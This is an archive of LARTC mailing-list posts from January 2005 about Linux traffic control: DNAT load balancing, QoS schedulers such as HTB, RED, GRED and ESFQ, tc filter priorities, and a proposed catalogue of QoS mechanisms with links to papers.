References: <20050103133255.2474878c@be.back.l8r.net><008201c4f1fd$e3d7ff20$0100a8c0@newlife><20050103210337.6d9e0ceb@be.back.l8r.net><00e301c4f204$e956b020$0100a8c0@newlife><20050103213010.444f999f@be.back.l8r.net><017801c4f20b$13887ad0$0100a8c0@newlife> <20050103222311.105e7c9e@be.back.l8r.net>
Message-ID: <01a701c4f20e$3dce2300$0100a8c0@newlife>

From: "Brad Barnett"
>
> It does, but before we go too much further, does anyone have an answer to
> my original question? I'm bogged for time (aren't we all? ;), and I'd
> prefer to just find out if my problems with DNAT are indeed from what I
> think...
>

But I am getting at the point that you can't really do a proper NAT load balancing without Julian's patches. You have to get it to compiled. Period.

Cheers.
From lists@L8R.net Tue Jan 4 03:46:31 2005
From: lists@L8R.net (Brad Barnett)
Date: Mon, 3 Jan 2005 22:46:31 -0500
Subject: [LARTC] load balancing and DNAT
In-Reply-To: <01a701c4f20e$3dce2300$0100a8c0@newlife>
References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> <00e301c4f204$e956b020$0100a8c0@newlife> <20050103213010.444f999f@be.back.l8r.net> <017801c4f20b$13887ad0$0100a8c0@newlife> <20050103222311.105e7c9e@be.back.l8r.net> <01a701c4f20e$3dce2300$0100a8c0@newlife>
Message-ID: <20050103224631.109b32b0@be.back.l8r.net>

On Tue, 4 Jan 2005 11:33:59 +0800 "Ming-Ching Tiew" wrote:

>
> From: "Brad Barnett"
> >
> > It does, but before we go too much further, does anyone have an answer
> > to my original question? I'm bogged for time (aren't we all? ;),
> > and I'd prefer to just find out if my problems with DNAT are indeed
> > from what I think...
> >
>
> But I am getting at the point that you can't really do a proper NAT load
> balancing without Julian's patches. You have to get it to compiled.
> Period.
>

Well, you can do load balancing, but yes.. it is much improved (to say the least) with his patches. However, I misspoke. I was referring to simple routing for multiple providers. That is, just routing back out on the interface that traffic originates on.

Unfortunately, since I can't apply Julian's patches, any benefits I might gain are not even worth consideration. :(

Since I tried to apply his patches, and am unable to, please stop rubbing my nose in it. ;) I am aware that I am missing something, please don't make my loss seem ever more painful ;P

From imipak@yahoo.com Tue Jan 4 05:39:12 2005
From: imipak@yahoo.com (Jonathan Day)
Date: Mon, 3 Jan 2005 21:39:12 -0800 (PST)
Subject: [LARTC] Scheduler Mechnisms!
In-Reply-To: <304808537.11599@njupt.edu.cn>
Message-ID: <20050104053912.37916.qmail@web12304.mail.yahoo.com>

It depends on what you mean by "more". More for Linux? Certainly.
HTB3 seems to be a popular mechanism, and you can use IMQ to set up an intermediate device to allow shaping of both inbound and outbound traffic, using one (or more!) scheduling mechanisms in series. (In fact, there are several versions of IMQ out there. I've given links to both the projects that seem to be alive, but there may be more.)

There's also ESFQ, but there doesn't seem to be much active work on that. There are forward ports to recent Linux kernels, though.

QLinux has a version of H-SFQ for Linux, but again it seems to be getting long in the tooth. Unfortunately, I can't find any forward ports of that.

http://luxik.cdi.cz/~devik/qos/htb/
http://www.linuximq.net/
http://pupa.da.ru/imq/
http://www.digriz.org.uk/jdg-qos-script/#qos-2.6
http://kem.p.lodz.pl/~peter/qnet/
http://lass.cs.umass.edu/software/qlinux/

There are a great many systems that I can't find a Linux version of. Cisco routers support something called "Class-Based Weighted Fair Queueing" (CBWFQ) which seems to be a hybrid of classful and classless scheduling. Cisco also has two versions of ECN, for forwards and backwards propagation.

I've listed below a number of papers detailing various QoS schemes. Some of these have been implemented in other OS' (the BSDs tend to get a lot of this stuff implemented quickly for them as part of ALTQ) and some I've never seen an implementation at all. However, the papers should all give enough information to write a version for Linux.

Note: ALTQ can be found at:
http://www.csl.sony.co.jp/person/kjc/kjc/software.html

Please note that this list is not exhaustive. Rather, I got exhausted after trying to find what was out there and what state it was currently in. QoS is a big field, if the number of papers is anything to go by. Linux only touches the fringes of it.

If anyone feels particularly bored, or in need of a good ego boost, it would be cool to see if a reasonable selection of these could be introduced into Linux over the 2.7 cycle.

EDF (Earliest Deadline First)
http://citeseer.ist.psu.edu/13919.html

BLUE (an alternative to RED)
http://citeseer.ist.psu.edu/feng99blue.html

AF PHB (Assured Forwarding Per-Hop Behaviour)
http://citeseer.ist.psu.edu/552302.html

SFB (Stochastic Fair Blue)
http://citeseer.ist.psu.edu/551253.html

GREEN (a pro-active variant on the theme of RED)
http://citeseer.ist.psu.edu/feng02green.html

SMART (Scalable Multipath Aggregated RouTing)
http://citeseer.ist.psu.edu/vutukury00smart.html

CSFQ (Core Stateless Fair Queueing)
http://citeseer.ist.psu.edu/391.html

StFQ (Start-Time Fair Queueing)
http://citeseer.ist.psu.edu/goyal96starttime.html

RFQ (Rainbow Fair Queueing)
http://citeseer.ist.psu.edu/cao00rainbow.html

PrFQ (Probabilistic Fair Queueing)
http://citeseer.ist.psu.edu/anker00prfq.html

ERR (Elastic Round Robin)
http://citeseer.ist.psu.edu/kanhere02fair.html

GFQ (Greedy Fair Queueing)
http://citeseer.ist.psu.edu/690207.html

PERR (Prioritized Elastic Round Robin)
http://citeseer.ist.psu.edu/681127.html

AOQ (Anchored Opportunity Queueing)
http://citeseer.ist.psu.edu/701742.html

BSFQ (Bin Sort Fair Queueing)
http://citeseer.ist.psu.edu/622188.html

As for the final question on what happens between enqueue and dequeue, there
are various diagrams out there which show different aspects of how packets
traverse the system. I've included a few links to those I could find:

http://open-source.arkoon.net/kernel/kernel_net.png
http://ebtables.sourceforge.net/br_fw_ia/PacketFlow.png
http://ebtables.sourceforge.net/br_fw_ia/br_fw_ia.html
http://www.docum.org/docum.org/kptd/

The last of these is the infamous Kernel Packet Travelling Diagram. Most
links to this that I've been able to find are broken. It should be noted that
the diagrams all refer to the Linux 2.4 kernel. Linux 2.6 has quite a few QoS
changes to it, but I'm unclear as to whether they significantly alter any of
the flows.

I hope this is of some use. Or, at the very least, is an effective remedy to
insomnia.
:)

Jonathan

--- Zhenyu Wu wrote:

> Hello,
>
> Normally, in addition to such qdisc scheduler mechanisms as FIFO, PQ, WRR,
> WFQ, are there any more? Then, there is a confusion on scheduler in Linux
> environment: Assume there is a qdisc, such as RED as a leaf qdisc in a
> router, we know, if there is packet which want to enqueue the packet, the
> Function red_enqueue is called, but when the packet leave the queue(when
> the Function red_dequeue is called)? I think it is meaningless when the
> packet leaves the queue just it entered it. Is there anything need to be
> done between the packet's enqueue and dequeue?
>
> Best,
>
>
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO:
> http://lartc.org/
>

From ngohoanggiang1981dh@yahoo.com Tue Jan 4 07:29:56 2005
From: ngohoanggiang1981dh@yahoo.com (ngo giang)
Date: Mon, 3 Jan 2005 23:29:56 -0800 (PST)
Subject: [LARTC] How to manage relatively internet bandwidth while don't know specific input internet bandwidth ?
Message-ID: <20050104072957.45355.qmail@web51610.mail.yahoo.com>

Hello,

My organization has a LAN network and the LAN is connected to internet by a
Cisco router.

internet -------| Cisco router |------ LAN

(The cisco router can not be replaced by a linux router, I think, because the
LAN has more than 1000 computers.)

LAN network is divided into some sub networks. I have to relatively manage
internet bandwidth (between applications and between computers) at these
sub-networks using linux router.

                 internet
                    |          ------------> bandwidth here is known.
              cisco router
               /    |    \  ....
           ............................
             /      |      \  ----------------> I don't know internet bandwidth of each sub network
          linux   linux   ......
          router  router
            /       |
           sub     sub     .....
         network network   .....

My problem is I don't know the internet bandwidth of each sub network.

Can you give me some suggestion about schemes I can use in a linux router
(what qdisc, ... ).

Thanks in advance,

nhgiang

From andy.furniss@dsl.pipex.com Tue Jan 4 13:57:25 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Tue, 04 Jan 2005 13:57:25 +0000
Subject: [LARTC] Weighted packet shaping?
In-Reply-To: <20050103112214.GA10708@circolab.net>
References: <41C97B57.80207@dsl.pipex.com> <20041222153607.GC11969@linux.comp> <41C9FB14.6000805@dsl.pipex.com> <20041223105418.GA19364@linux.comp> <41CC22F1.70907@dsl.pipex.com> <20041224150730.GA18760@linux.comp> <41CC457A.5040405@dsl.pipex.com> <20041226042648.GA24904@linux.comp> <41CEB816.5030902@dsl.pipex.com> <20041228092343.GA8003@linux.comp> <20050103112214.GA10708@circolab.net>
Message-ID: <41DAA0C5.5000701@dsl.pipex.com>

marco ghidinelli wrote:

>
> ok, maybe i'm wrong, but i try to run the same script, and i think that
> the script have problem setting prio 0 on filters:
>
> running:
>
> $TC filter add dev $IFNAME parent 1:0 prio 0 protocol ip handle 22 fw flowid 1:20
> $TC filter add dev $IFNAME parent 1:0 prio 2 protocol ip handle 21 fw flowid 1:21
>
> gave me:
>
> # tc filter list dev eth0
> filter parent 1: protocol ip pref 2 fw
> filter parent 1: protocol ip pref 2 fw handle 0x15 classid 1:21
> filter parent 1: protocol ip pref 49152 fw
> filter parent 1: protocol ip pref 49152 fw handle 0x16 classid 1:20
>
> ----------------------------------^^^^^
>
> don't blame me if this is obvious/wrong/stupid. :)

Well spotted - you are right, I see the same, so it looks like 0 is not the
highest prio when used on filters - I shall use 1 in future.

As for affecting this test - I don't think it will make any difference in
this case because it just affects the order that the matches get tested
against the packets. With only 3 tests and low packets/sec it should make no
difference.

It's still useful to know for other setups, though - thanks.

Andy.

>
> 2.6.10, with latest iproute2
>

From justin@expertron.co.za Tue Jan 4 15:09:40 2005
From: justin@expertron.co.za (Justin Schoeman)
Date: Tue, 04 Jan 2005 17:09:40 +0200
Subject: [LARTC] ESFQ?
Message-ID: <41DAB1B4.6030902@expertron.co.za>

Hi again,

I was just looking around for ESFQ sources, and I see that the main site
is down, and only has kernel 2.6.4 patches.

Is ESFQ maintained? If so, where can I find patches for 2.6.10?

Thanks,
-justin

From alg0@iit.demokritos.gr Tue Jan 4 17:49:46 2005
From: alg0@iit.demokritos.gr (Antonios Chalkiopoulos)
Date: Tue, 4 Jan 2005 19:49:46 +0200
Subject: [LARTC] HTB + GRED (santa clauss plz help me out)
In-Reply-To: <41D57F49.2050201@dsl.pipex.com>
References: <20041230061315.5399.60774.Mailman@outpost.ds9a.nl> <200412301907.21005.alg0@iit.demokritos.gr> <41D57F49.2050201@dsl.pipex.com>
Message-ID: <200501041949.46730.alg0@iit.demokritos.gr>

Dear Andy,

> > I've been trying for a long time now to make HTB and GRED to work
> > together. The problem being that GRED doesn't use handles (instead it
> > uses DP:1 DP:2 etc) i can not properly filter traffic to them.
> >
> > Tomas Graf suggested to use the tc_index index of u32 classifier
> >
> > so dear Santa .. i am currently with the following scripts that works!
>
> Have you seen this
>
> http://www.opalsoft.net/qos/DS-27.htm
>
> Though if it works you don't need it :-)

I am aware of it and have spent a few hours trying to make it work... without
any success.

>
> > But when i try to add an HTB before the GRED, everything goes to hell.
>
> You may need to repeat filters to get HTB to go from root to GRED (well
> you do with PRIO) eg. from a usenet post.

That IS EXACTLY MY PROBLEM. In the case of ordinary qdiscs i repeat my
filters to the new handles (3:1 3:2 etc). In the case of GRED there are no
handles to play with and i am unable to filter traffic into GRED...

Antonios

From imipak@yahoo.com Tue Jan 4 18:04:42 2005
From: imipak@yahoo.com (Jonathan Day)
Date: Tue, 4 Jan 2005 10:04:42 -0800 (PST)
Subject: [LARTC] ESFQ?
In-Reply-To: <41DAB1B4.6030902@expertron.co.za>
Message-ID: <20050104180442.47689.qmail@web12304.mail.yahoo.com>

To the best of my knowledge, ESFQ for Linux is essentially dead. There's a
patchset - QNet - which does port ESFQ to the 2.6.8/2.6.9 kernels, but ESFQ
is not split out, so it looks like an all-or-nothing deal.

http://kem.p.lodz.pl/~peter/qnet/

I don't know if QNet is still being maintained - the last update on the page
refers to October 2004 - and there's nothing to indicate how well the forward
ports actually work in practice.

A search using Google shows only older ESFQ versions (one for 2.6.0-test11,
for example) but nothing newer.

There was one posting about ESFQ to the kernel developers mailing list, but I
couldn't see any follow-ups to it. Nor does it appear to be in Andrew
Morton's patchset (an excellent indicator of interest level and the
probability of ending up in the official kernel).

Unfortunately, this seems to be fairly common in Linux QoS - too many one-man
projects and too few resources to keep them going.

--- Justin Schoeman wrote:

> Hi again,
>
> I was just looking around for ESFQ sources, and I see that the main site
> is down, and only has kernel 2.6.4 patches.
>
> Is ESFQ maintained? If so, where can I find patches for 2.6.10?
>
> Thanks,
> -justin

From Zhenyu Wu"

Thank you very much, i will try to find these papers which must be very
helpful for me. The "more" means that whether there are other mechanisms not
only for Linux. Sorry, i have not made it clear!
Sometimes, i wonder whether the qdiscs such as CBQ, RED, GRED ... belong to
the scheduler mechanisms in linux environment. For example, In Red, which i
can find are enqueue, and dequeue.... so, if i add a RED qdisc to a class,
must i add a scheduler mechanism so that i can decide which packet in the
queues will be scheduled and put to the link?

Good luck,
Best,

> It depends on what you mean by "more". More for Linux?
> Certainly. HTB3 seems to be a popular mechanism, and
> you can use IMQ to set up an intermediate device to
> allow shaping of both inbound and outbound traffic,
> using one (or more!) scheduling mechanisms in series.
>
> (In fact, there are several versions of IMQ out there.
> I've given links to both the projects that seem to be
> alive, but there may be more.)
>
> There's also ESFQ, but there doesn't seem to be much
> active work on that. There are forward ports to recent
> Linux kernels, though. QLinux has a version of H-SFQ
> for Linux, but again it seems to be getting long in
> the tooth. Unfortunately, I can't find any forward
> ports of that.
>
> http://luxik.cdi.cz/~devik/qos/htb/
> http://www.linuximq.net/
> http://pupa.da.ru/imq/
>
> http://www.digriz.org.uk/jdg-qos-script/#qos-2.6
> http://kem.p.lodz.pl/~peter/qnet/
> http://lass.cs.umass.edu/software/qlinux/
>
> There are a great many systems that I can't find a
> Linux version of. Cisco routers support something
> called "Class-Based Weighted Fair Queueing" (CBWFQ)
> which seems to be a hybrid of classful and classless
> scheduling. Cisco also has two versions of ECN, for
> forwards and backwards propagation.
>
> I've listed below a number of papers detailing various
> QoS schemes. Some of these have been implemented in
> other OS' (the BSDs tend to get a lot of this stuff
> implemented quickly for them as part of ALTQ) and some
> I've never seen an implementation at all. However, the
> papers should all give enough information to write a
> version for Linux.
>
> Note: ALTQ can be found at:
> http://www.csl.sony.co.jp/person/kjc/kjc/software.html
>
> Please note that this list is not exhaustive. Rather,
> I got exhausted after trying to find what was out
> there and what state it was currently in. QoS is a big
> field, if the number of papers is anything to go by.
> Linux only touches the fringes of it. If anyone feels
> particularly bored, or in need of a good ego boost, it
> would be cool to see if a reasonable selection of
> these could be introduced into Linux over the 2.7
> cycle.
>
> EDF (Earliest Deadline First)
> http://citeseer.ist.psu.edu/13919.html
>
> BLUE (an alternative to RED)
> http://citeseer.ist.psu.edu/feng99blue.html
>
> AF PHB (Assured Forwarding Per-Hop Behaviour)
> http://citeseer.ist.psu.edu/552302.html
>
> SFB (Stochastic Fair Blue)
> http://citeseer.ist.psu.edu/551253.html
>
> GREEN (a pro-active variant on the theme of RED)
> http://citeseer.ist.psu.edu/feng02green.html
>
> SMART (Scalable Multipath Aggregated RouTing)
> http://citeseer.ist.psu.edu/vutukury00smart.html
>
> CSFQ (Core Stateless Fair Queueing)
> http://citeseer.ist.psu.edu/391.html
>
> StFQ (Start-Time Fair Queueing)
> http://citeseer.ist.psu.edu/goyal96starttime.html
>
> RFQ (Rainbow Fair Queueing)
> http://citeseer.ist.psu.edu/cao00rainbow.html
>
> PrFQ (Probabilistic Fair Queueing)
> http://citeseer.ist.psu.edu/anker00prfq.html
>
> ERR (Elastic Round Robin)
> http://citeseer.ist.psu.edu/kanhere02fair.html
>
> GFQ (Greedy Fair Queueing)
> http://citeseer.ist.psu.edu/690207.html
>
> PERR (Prioritized Elastic Round Robin)
> http://citeseer.ist.psu.edu/681127.html
>
> AOQ (Anchored Opportunity Queueing)
> http://citeseer.ist.psu.edu/701742.html
>
> BSFQ (Bin Sort Fair Queueing)
> http://citeseer.ist.psu.edu/622188.html
>
>
> As for the final question on what happens between
> enqueue and dequeue, there are various diagrams out
> there which show different aspects of how packets
> traverse the system.
> I've included a few links to those I could find:
>
> http://open-source.arkoon.net/kernel/kernel_net.png
> http://ebtables.sourceforge.net/br_fw_ia/PacketFlow.png
> http://ebtables.sourceforge.net/br_fw_ia/br_fw_ia.html
> http://www.docum.org/docum.org/kptd/
>
> The last of these is the infamous Kernel Packet
> Travelling Diagram. Most links to this that I've been
> able to find are broken. It should be noted that the
> diagrams all refer to the Linux 2.4 kernel. Linux 2.6
> has quite a few QoS changes to it, but I'm unclear as
> to whether they significantly alter any of the flows.
>
> I hope this is of some use. Or, at the very least, is
> an effective remedy to insomnia. :)
>
> Jonathan
>
> --- Zhenyu Wu wrote:
>
> > Hello,
> >
> > Normally, in addition to such qdisc scheduler mechanisms as FIFO, PQ,
> > WRR, WFQ, are there any more? Then, there is a confusion on scheduler
> > in Linux environment: Assume there is a qdisc, such as RED as a leaf
> > qdisc in a router, we know, if there is packet which want to enqueue
> > the packet, the Function red_enqueue is called, but when the packet
> > leave the queue(when the Function red_dequeue is called)? I think it is
> > meaningless when the packet leaves the queue just it entered it. Is
> > there anything need to be done between the packet's enqueue and dequeue?
> >
> > Best,

From imipak@yahoo.com Wed Jan 5 03:59:46 2005
From: imipak@yahoo.com (Jonathan Day)
Date: Tue, 4 Jan 2005 19:59:46 -0800 (PST)
Subject: [LARTC] Scheduler Mechnisms!
In-Reply-To: <304889647.25037@njupt.edu.cn>
Message-ID: <20050105035946.38738.qmail@web12303.mail.yahoo.com>

I may be wrong on this, but I believe that RED can be attached to any
queueing system, including the basic FIFO queues. In a sense, you're still
using a scheduling system, when using the default arrangement, it's just a
first-come, first-served one.

RED is classless and applies to the whole of a queue. What that queue is
attached to, if I understand it correctly, isn't important. It can be a
class, but it can just as easily be everything going through that device.

Again, someone correct me if I'm wrong, but as I understand it, there are
four levels to the whole QoS/diffserv concept.

One of these levels is the queueing discipline. This can be something like
CBQ, WFQ, FIFO, PRIO, or whatever. This is how the data is organized, it does
not describe how the data is sent. In the case of something like CBQ, you
have a defined set of queues in parallel, with rules as to what packets fall
into what queue. On the other hand, queueing schemes such as FIFO are flat.
There's a single queue that everything goes through, though there may be
different rules for how things get pushed to it.

Another level is the scheduling mechanism. This describes how the data is
sent, once organized, but does not describe the organization itself. If
you've only one queue, then there's really not much to schedule. If you've
multiple queues, then it's fairly normal to use "round robin" or "weighted
round robin" to pick which queue to pull a packet from. Linux' CBQ uses
"weighted round robin", according to the C file.

The next level is the packet dropping mechanism. When queues flood, packets
are going to be dropped. There's nowhere to store them. I'm pretty sure the
default behaviour is to simply continue accepting packets, but to drop any
that expire before being sent or which fall off the end of the queue (if the
queue is bounded).
RED, GRED, and a whole host of similar mechanisms, try to drop packets in a
more controlled manner. However, that is really all they do.

Finally, there are mechanisms for damping overly active applications, such as
ECN. The idea here is that if you throttle back whatever is generating excess
traffic, you don't get the problems associated with dealing with it. The
"default" behaviour is to do nothing.

When setting up QoS - on Linux or anything else - you basically pick one of
each of the four categories to assemble a packet delivery system. Even
without QoS, you're doing that, you're just using the defaults in all cases.
The mechanisms are still going to be there.

The Linux configuration menu does NOT match the above terminology, or the
terminology in the source code. Thus, the source code identifies CBQ as a
queueing discipline, but the configuration menu calls it a scheduler. The QoS
help is also not very helpful, as it mostly tells people to look at the
source. However, if you look at the source for CBQ or RED, for example, the
explanation is relative to the cited papers, so you then have to go and read
those before coming back and doing anything.

This is one area I hope is going to get resolved in the reasonably near
future. If not, I might have to come up with a patch myself. The very thought
of that should send shivers down the spines of any kernel developers out
there.

Jonathan

--- Zhenyu Wu wrote:

> Thank you very much, i will try to find these papers which must be very
> helpful for me. The "more" means that whether there are other mechanisms
> not only for Linux. Sorry, i have not made it clear! Sometimes, i wonder
> whether the qdiscs such as CBQ, RED, GRED ... belong to the scheduler
> mechanisms in linux environment. For example, In Red, which i can find
> are enqueue, and dequeue....
> so, if i add a RED qdisc to a class, must i add a scheduler mechanism so
> that i can decide which packet in the queues will be scheduled and put to
> the link?
>
> Good luck,
> Best,

From imipak@yahoo.com Wed Jan 5 04:24:00 2005
From: imipak@yahoo.com (Jonathan Day)
Date: Tue, 4 Jan 2005 20:24:00 -0800 (PST)
Subject: [LARTC] Suggestion - table of QoS mechanisms
Message-ID: <20050105042400.61837.qmail@web12308.mail.yahoo.com>

Hi,

A thought for the list. As I mentioned in another posting, there are a lot of
QoS mechanisms out there. Linux supports some, but not all. Some patchsets
add others, but don't work for all kernels. There are also userland
implementations, usually sitting in software routers, but there are other
packages.

Would it be helpful if I worked on a table of what's out there for Linux and
in what form?

The main drawback of such a list is that while I can tell you if
such-and-such an implementation exists, that doesn't mean the implementation
is any good, or that the QoS concept is valid. There are plenty of arguments
amongst QoS researchers as to whether RED is useful or not, and those are the
people most qualified to know the answer. Nor would I be able to verify what
kernel patches work well together, so the individual existence of specific
mechanisms doesn't mean you can combine them usefully.

On the other hand, there doesn't seem to be any easy way for people to find
out what does exist, what doesn't exist YET for Linux but could easily be
written, or what used to exist but has been dropped for reasons known or
unknown.

For example, SGI's "Scheduled Transfer Protocol", MPLS, WRR and ESFQ are all
examples of networking algorithms that are apparently deceased. The Layer 7
packet classifier isn't dead, but doesn't apply cleanly to kernels 2.6.9 or
later.

Finding these can be fun, too.
I've got a copy of the Scheduled Transfer Protocol patches, but that's
because I downloaded them while they were still on SGI's FTP site. If they
exist anywhere on the Internet today, I haven't the foggiest where. The site
for ESFQ is dead, and the only known patches forward-ported to recent kernels
is merged into the qnet patch series, making it hard to extract.

Any thoughts on this?

Jonathan

From jasonb@edseek.com Wed Jan 5 04:35:13 2005
From: jasonb@edseek.com (Jason Boxman)
Date: Tue, 4 Jan 2005 23:35:13 -0500
Subject: [LARTC] Suggestion - table of QoS mechanisms
In-Reply-To: <20050105042400.61837.qmail@web12308.mail.yahoo.com>
References: <20050105042400.61837.qmail@web12308.mail.yahoo.com>
Message-ID: <200501042335.13925.jasonb@edseek.com>

On Tuesday 04 January 2005 23:24, Jonathan Day wrote:
> Hi,
>
> A thought for the list. As I mentioned in another
> posting, there are a lot of QoS mechanisms out there.
> Linux supports some, but not all. Some patchsets add
> others, but don't work for all kernels. There are also
> userland implementations, usually sitting in software
> routers, but there are other packages.
>
> Would it be helpful if I worked on a table of what's
> out there for Linux and in what form?

Possibly.

I only know of CBQ, HTB, HFSC, SFQ, TBF, PFIFO, PRIO, G/RED for Linux
offhand.

> The main drawback of such a list is that while I can
> tell you if such-and-such an implementation exists,
> that doesn't mean the implementation is any good, or
> that the QoS concept is valid. There are plenty of
> arguments amongst QoS researchers as to whether RED is
> useful or not, and those are the people most qualified
> to know the answer. Nor would I be able to verify what
> kernel patches work well together, so the individual
> existence of specific mechanisms doesn't mean you can
> combine them usefully.

Yeah, QoS isn't exactly a plug and play experience.

> On the other hand, there doesn't seem to be any easy
> way for people to find out what does exist, what
> doesn't exist YET for Linux but could easily be
> written, or what used to exist but has been dropped
> for reasons known or unknown.

I wrote a guide, Practical Guide to Linux Traffic Control[1], which I keep up
to date as developments change. I only cover stuff in the mainline kernel for
the most part, though.

[1] http://trekweb.com/~jasonb/articles/traffic_shaping/

> For example, SGI's "Scheduled Transfer Protocol",
> MPLS, WRR and ESFQ are all examples of networking
> algorithms that are apparently deceased. The Layer 7
> packet classifier isn't dead, but doesn't apply
> cleanly to kernels 2.6.9 or later.

Layer 7 does patch against 2.6.9 with an experimental patch available since
the beginning of December on the project's SF page. It Works For Me (tm) but
I guess it hasn't been tested sufficiently such that it's now available as a
stable 2.6.9+ patch.

> Finding these can be fun, too. I've got a copy of the
> Scheduled Transfer Protocol patches, but that's
> because I downloaded them while they were still on
> SGI's FTP site. If they exist anywhere on the Internet
> today, I haven't the foggiest where. The site for ESFQ
> is dead, and the only known patches forward-ported to
> recent kernels is merged into the qnet patch series,
> making it hard to extract.

That's too bad. I had wanted to include something about ESFQ but never got
around to it, since SFQ generally suits my needs.

--
Jason Boxman
Perl Programmer / *NIX Systems Administrator
Shimberg Center for Affordable Housing | University of Florida
http://edseek.com/ - Linux and FOSS stuff

From imipak@yahoo.com Wed Jan 5 06:03:59 2005
From: imipak@yahoo.com (Jonathan Day)
Date: Tue, 4 Jan 2005 22:03:59 -0800 (PST)
Subject: [LARTC] Suggestion - table of QoS mechanisms
In-Reply-To: <200501042335.13925.jasonb@edseek.com>
Message-ID: <20050105060359.58719.qmail@web12303.mail.yahoo.com>

The URL for the guide was useful, thanks. Here are a few other QoS systems
for Linux:

RSVP is provided in the stock kernel. This allows you to reserve a given
amount of bandwidth for a specific UDP data stream. It is typically not used
in "the real world" because it doesn't scale well. Too much state information
needs to be transmitted and kept track of, to be useful on backbone routers.

USAGI is based on KAME, and KAME supports ALTQ. In turn, ALTQ supports HFSC,
JoBS, RIO and BLUE for both IPv4 and IPv6. It is NOT clear from the USAGI web
page as to whether ALTQ is included in their code.

http://www.linux-ipv6.org/
http://www.csl.sony.co.jp/person/kjc/kjc/software.html

QLinux supports H-SFQ, but is based on Linux 2.2 and the 2.4 sources don't
seem to have ever been released.

http://lass.cs.umass.edu/software/qlinux/

DGT2684 (seems to be dead, unless the pseudo-QoS for ATM in the Linux kernel
is based on this, but then the code on Sourceforge should be current, you'd
have thought)

http://sourceforge.net/projects/dgt2684

I'm not altogether sure what SIMA did, but it seems to have been a queueing
system of sorts for the 2.2 kernels.

http://www.atm.tut.fi/faster/sima/

It's a cheat, but you can route traffic onto and off Network Simulator and
therefore use any QoS devices available for that for regular networking. This
includes Fair Queueing, Stochastic Fair Queueing and Deficit Round Robin, by
default. Many of the ALTQ routines have NS implementations, as well, and I'm
sure there are others.
NS seems to be popular with protocol researchers.

http://www.isi.edu/nsnam/ns/

There's also a QoS Library which provides a useful API for applications.

http://www.coverfire.com/lql/

Finally, I also mentioned SGI's STP patch. STP allows you to reserve network
resources for a future data stream. As far as I can tell, it is very similar
in concept to RSVP, except that it is not UDP-specific and is specifically
designed for very high-speed networks, where constructing and destructing
connections at the time of use can add excessive latency. By pre-allocating,
the connection can all be set up and ready to use when it is actually needed.

--- Jason Boxman wrote:

(snip)

> Possibly.
>
> I only know of CBQ, HTB, HFSC, SFQ, TBF, PFIFO,
> PRIO, G/RED for Linux offhand.

(snip)

From fed Wed Jan 5 07:02:12 2005
From: fed (fed)
Date: Wed, 5 Jan 2005 08:02:12 +0100
Subject: [LARTC] Connections direct to the gateway
Message-ID:

Hi,

I use the fairnat scripts on a linux gateway, on this gateway runs a
transparent web proxy, a local web server and some other few applications for
the clients in the lan.

Using these scripts limits the bandwidth of the connection to the gateway too
so for example the proxy becomes unuseful.

Is it possible with some rules or another way to get the full bandwidth and
not limit it for the connection from the clients in the lan direct to the
gateway ?

Bye
Thanks for the help.

From justin@expertron.co.za Wed Jan 5 07:18:55 2005
From: justin@expertron.co.za (Justin Schoeman)
Date: Wed, 05 Jan 2005 09:18:55 +0200
Subject: [LARTC] ESFQ?
In-Reply-To: <20050104180442.47689.qmail@web12304.mail.yahoo.com>
References: <20050104180442.47689.qmail@web12304.mail.yahoo.com>
Message-ID: <41DB94DF.2070407@expertron.co.za>

Ouch... Is there any other way to do host-based fair sharing (well, other
than actually classifying each host :-( )?

Thanks,
-justin

Jonathan Day wrote:
> To the best of my knowledge, ESFQ for Linux is
> essentially dead. There's a patchset - QNet - which
> does port ESFQ to the 2.6.8/2.6.9 kernels, but ESFQ is
> not split out, so it looks like an all-or-nothing
> deal.
>
> http://kem.p.lodz.pl/~peter/qnet/
>
> I don't know if QNet is still being maintained - the
> last update on the page refers to October 2004 - and
> there's nothing to indicate how well the forward ports
> actually work in practice.
>
> A search using Google shows only older ESFQ versions
> (one for 2.6.0-test11, for example) but nothing newer.
>
> There was one posting about ESFQ to the kernel
> developers mailing list, but I couldn't see any
> follow-ups to it. Nor does it appear to be in Andrew
> Morton's patchset (an excellent indicator of interest
> level and the probability of ending up in the official
> kernel).
>
> Unfortunately, this seems to be fairly common in Linux
> QoS - too many one-man projects and too few resources
> to keep them going.
>
> --- Justin Schoeman wrote:
>
>
>>Hi again,
>>
>>I was just looking around for ESFQ sources, and I
>>see that the main site
>>is down, and only has kernel 2.6.4 patches.
>>
>>Is ESFQ maintained? If so, where can I find patches
>>for 2.6.10?
>>
>>Thanks,
>>-justin

From andy.furniss@dsl.pipex.com Wed Jan 5 08:20:09 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Wed, 05 Jan 2005 08:20:09 +0000
Subject: [LARTC] ESFQ?
In-Reply-To: <41DB94DF.2070407@expertron.co.za> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> Message-ID: <41DBA339.3060407@dsl.pipex.com> Justin Schoeman wrote: > Ouch... Is there any other way to do host-based fair sharing (well, > other than actually classifying each host :-( )? I don't think it will take much to get it to work - though I haven't tried :-) . I'll have a look at doing a 2.6.10 in the next few days. Andy. From justin@expertron.co.za Wed Jan 5 08:46:10 2005 From: justin@expertron.co.za (Justin Schoeman) Date: Wed, 05 Jan 2005 10:46:10 +0200 Subject: [LARTC] ESFQ? In-Reply-To: <41DBA339.3060407@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> Message-ID: <41DBA952.5010203@expertron.co.za> Woohoo - that would be great! -justin Andy Furniss wrote: > Justin Schoeman wrote: > >> Ouch... Is there any other way to do host-based fair sharing (well, >> other than actually classifying each host :-( )? > > > I don't think it will take much to get it to work - though I haven't > tried :-) . > > I'll have a look at doing a 2.6.10 in the next few days. > > Andy. > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From ngohoanggiang1981dh@yahoo.com Wed Jan 5 09:09:41 2005 From: ngohoanggiang1981dh@yahoo.com (ngo giang) Date: Wed, 5 